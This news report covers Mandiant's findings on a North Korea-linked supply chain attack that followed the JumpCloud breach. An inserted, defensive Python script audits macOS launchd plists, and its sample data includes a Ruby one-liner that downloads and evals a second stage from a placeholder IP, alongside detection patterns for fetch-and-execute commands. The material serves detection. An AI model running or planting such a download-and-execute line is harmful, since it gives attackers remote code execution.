Mandiant discovered a supply chain attack against a U.S. software company that stemmed from last month's data breach at JumpCloud.
JumpCloud earlier this month disclosed it had been breached by a nation-state threat actor through a spear phishing campaign. JumpCloud CISO Robert Phan said in a blog post that the threat actor compromised the cloud provider's commands framework and used it for malicious data injection in "extremely targeted" attacks against a small number of customers. JumpCloud first issued an advisory on July 5 for a mandatory API key rotation in response to an "ongoing incident," though it did not say at the time that the company's network had been breached.
In a blog post Monday, Mandiant shed additional light on the JumpCloud breach and subsequent attacks against its customers. The Google Cloud-owned infosec firm said it responded to a supply chain attack this month against an unnamed U.S. software company and JumpCloud customer.
"We believe the compromise ultimately began as a result of a sophisticated spear phishing campaign aimed at JumpCloud, a zero-trust directory platform service used for identity and access management," Mandiant researchers wrote in the blog post.
Mandiant said it identified a malicious script on June 27 that had been executed by a JumpCloud agent at the U.S. software company. "Initial access was gained by compromising JumpCloud and inserting malicious code into their commands framework," the post said. "In at least one instance, the malicious code was a lightweight Ruby script that was executed via the JumpCloud agent."
The Ruby script was designed to download and execute a second payload. Mandiant found that within 24 hours of gaining access to the customer's environment, the threat actor had established persistent access through backdoors and plist files (the property lists macOS uses to register launch agents and daemons), and had removed the initial Ruby payload and the second-stage backdoor to cover its tracks.
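The persistence pattern described above (an interpreter one-liner that fetches a second stage, plus launchd plist files that keep a backdoor running) is what a responder would hunt for on affected Macs. The following is an added example, not code from Mandiant, JumpCloud or the article: it parses launchd property lists with Python's standard `plistlib` and flags jobs that auto-start from user-writable paths, invoke an interpreter with a download-and-execute one-liner, or carry an Apple-style label while pointing outside system directories. The sample plists, their paths, the label names and the 203.0.113.10 address are constructed for this example and do not come from the incident.

```python
"""Audit macOS launchd plists for download-and-execute persistence.

Added example, not code from Mandiant, JumpCloud or the article. It parses
LaunchAgent/LaunchDaemon property lists of the kind the article says the
attacker used for persistence and flags what a responder would look for.
All sample plists, paths, labels and addresses below are constructed.
"""
import os
import plistlib
import re
from dataclasses import dataclass, field
from typing import Optional

# Directories a launchd job should not normally be loading its program from.
USER_WRITABLE_DIRS = ("/tmp/", "/private/tmp/", "/var/tmp/", "/Users/Shared/", "/Library/Caches/")
# Interpreters whose one-liners can fetch and run a second stage.
INTERPRETERS = {"ruby", "python", "python3", "perl", "sh", "bash", "zsh", "osascript"}
FETCH_RE = re.compile(r"curl\b|wget\b|open-uri|Net::HTTP|urllib|https?://")
EXEC_RE = re.compile(r"\b(eval|exec|system|instance_eval)\b|\|\s*(sh|bash|zsh)\b")
# Paths where genuine com.apple.* jobs live (assumption for this example).
APPLE_JOB_DIRS = ("/System/", "/usr/", "/Library/Apple/")


@dataclass
class Finding:
    plist_path: str
    label: str
    reasons: list = field(default_factory=list)


def program_argv(job: dict) -> list:
    """Return the argv launchd would run, from ProgramArguments or Program."""
    if "ProgramArguments" in job:
        return [str(a) for a in job["ProgramArguments"]]
    return [str(job["Program"])] if "Program" in job else []


def audit_plist(plist_path: str, raw: bytes) -> Optional[Finding]:
    """Parse one launchd plist and return a Finding, or None if nothing looks off."""
    job = plistlib.loads(raw)
    argv = program_argv(job)
    label = str(job.get("Label", ""))
    program = argv[0] if argv else ""
    autostart = bool(job.get("RunAtLoad")) or bool(job.get("KeepAlive"))
    cmdline = " ".join(argv)
    reasons = []

    if autostart and any(a.startswith(USER_WRITABLE_DIRS) for a in argv):
        reasons.append("auto-started job runs from a user-writable or temporary path")
    if (os.path.basename(program) in INTERPRETERS
            and FETCH_RE.search(cmdline) and EXEC_RE.search(cmdline)):
        reasons.append("interpreter one-liner fetches and executes remote content")
    if label.startswith("com.apple.") and program and not program.startswith(APPLE_JOB_DIRS):
        reasons.append("Apple-style label but program outside system paths")

    return Finding(plist_path, label, reasons) if reasons else None


def audit_all(plists: dict) -> list:
    """Audit a {path: raw_bytes} mapping, e.g. read from the LaunchAgents directories."""
    return [f for p, raw in plists.items() if (f := audit_plist(p, raw))]


def _plist(label: str, args: list, run_at_load: bool = True) -> bytes:
    """Build an XML plist for a launchd job (constructed sample data)."""
    return plistlib.dumps({"Label": label, "ProgramArguments": args, "RunAtLoad": run_at_load})


# Constructed sample jobs: one benign, two modelled on the persistence pattern described.
SAMPLE_PLISTS = {
    "/Library/LaunchDaemons/com.example.updater.plist": _plist(
        "com.example.updater", ["/Applications/Example.app/Contents/MacOS/updater", "--check"]),
    "/Users/alice/Library/LaunchAgents/com.apple.softwareupdated.plist": _plist(
        "com.apple.softwareupdated", ["/Users/Shared/.cache/agent", "-d"]),
    "/Users/alice/Library/LaunchAgents/com.system.helper.plist": _plist(
        "com.system.helper",
        ["/usr/bin/ruby", "-e",
         "require 'open-uri'; eval(URI.open('http://203.0.113.10/stage2').read)"]),
}

if __name__ == "__main__":
    for f in audit_all(SAMPLE_PLISTS):
        print(f"{f.plist_path} ({f.label}):")
        for r in f.reasons:
            print(f"  - {r}")
```

On a live system the same function would be fed the contents of `/Library/LaunchAgents`, `/Library/LaunchDaemons` and each user's `~/Library/LaunchAgents`; `plistlib.loads` accepts binary as well as XML property lists, so no conversion is needed first. The checks are deliberately narrow heuristics, and a job that passes them is not thereby clean: pair them with a baseline of known-good labels and file hashes from an unaffected host.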
Mandiant attributed the supply chain attack to UNC4899, a Democratic People's Republic of Korea (DPRK) "nexus actor" that has a track record for targeting cryptocurrency companies. Mandiant researchers assessed with high confidence that UNC4899 is a cryptocurrency-focused group within the DPRK's intelligence agency known as the Reconnaissance General Bureau (RGB).
In this supply chain attack, Mandiant observed the attackers "targeting macOS keychains and reconnaissance data associated with executives and internal security teams." The vendor added that UNC4899 "likely corresponds" to the DPRK-affiliated advanced persistent threat group TraderTraitor, which CISA profiled in an advisory last year.
SentinelOne last Thursday attributed the JumpCloud breach to a DPRK state-sponsored actor. JumpCloud published an update the same day stating that CrowdStrike, the company's incident response provider, identified and confirmed the threat actor was affiliated with DPRK. JumpCloud also said fewer than five customers and 10 devices total were affected by the resulting attacks.
In its report, Mandiant noted that UNC4899 committed a crucial operational security "fumble" in its recent attacks. The researchers said RGB-connected threat actors typically deploy operational relay boxes (ORBs) as proxy infrastructure and use L2TP/IPsec tunnels and commercial VPNs, such as ExpressVPN, NordVPN and TorGuard, to obscure their true source addresses.
However, Mandiant noted that those VPNs "occasionally fail" and expose the real source IP address. In this case, researchers observed UNC4899 connecting directly to an attacker-controlled ORB from a subnet in the Ryugyong-dong district of Pyongyang, North Korea.
"Additionally we observed the DPRK threat actor log directly into a Pyongyang IP, from one of their jump boxes," Mandiant said in the blog post. "Our evidence supports that this was an OPSEC slip up since the connection to the North Korean netblock was short-lived."
Mandiant also warned of increasing supply chain threats from DPRK threat groups. Researchers said the JumpCloud breach, as well as the 3CX supply chain compromise earlier this year, have demonstrated the "cascading effects" of breaching service providers to gain access to downstream customers.
"Both operations have suspected ties to financially motivated DPRK actors, suggesting that DPRK operators are implementing supply chain TTPs [tactics, techniques and procedures] to target select entities as part of increased efforts to target cryptocurrency and fintech-related assets," Mandiant said.
Rob Wright is a longtime technology reporter who lives in the Boston area.